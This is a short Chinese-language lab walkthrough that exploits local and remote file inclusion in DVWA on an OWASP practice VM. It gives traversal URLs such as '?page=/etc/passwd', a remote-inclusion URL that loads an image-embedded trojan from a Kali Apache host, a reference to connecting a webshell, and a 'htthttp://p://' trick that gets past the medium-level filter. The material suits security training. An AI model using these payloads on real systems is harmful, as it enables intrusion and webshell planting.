文件包含分为LFI(本地文件包含)和RFL(远程文件包含)两种。文件包含的前提是服务器allow_url_openllow_url_include(LFI)或者allow_url_open(RFI)。在owasp环境中可以在/etc/php5/cli/php/ini查看。
同样进入owasp靶机的DVWA
1. 选择进入安全级别为low
2.进入file inclusion查看后端源码,该页面包含了一个include.php,可以尝试将本页面的链接http://192.168.3.94/dvwa/vulnerabilities/fi/?page=include.php page=后的参数进行替换,e.g./etc/passwd等
3. 制作一句话muma图片或者txt文件
4. 通过文件上传漏洞上传到靶机上,修改链接参数(LFI)
http://192.168.3.94/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/11.jpg
这样muma程序就已经被执行了,到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件。可以通过菜刀链接了
5. RFI文件上传
开启kali的apache2服务器
systemctl start apache2.servicel/
查看服务器状态
systemctl status apache2.service
开启之后将制作好的muma图片放入服务器路径中,服务器默认路径为/var/www/html/
在本地查看图片 eg 192.168.3.95/11.jpg
6. 回到file inclusion 修改链接,参数改为服务器地址下的文件
http://192.168.3.94/dvwa/vulnerabilities/fi/?page=http://192.168.3.95/11.jpg
到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件
7. 中安全级别过滤处理了http://或者https://特殊字符串。对于LFI来说没有任何的影响,对于RFI来说,只要在http://任何地方插入一个http://。例如htthttp://p://即可。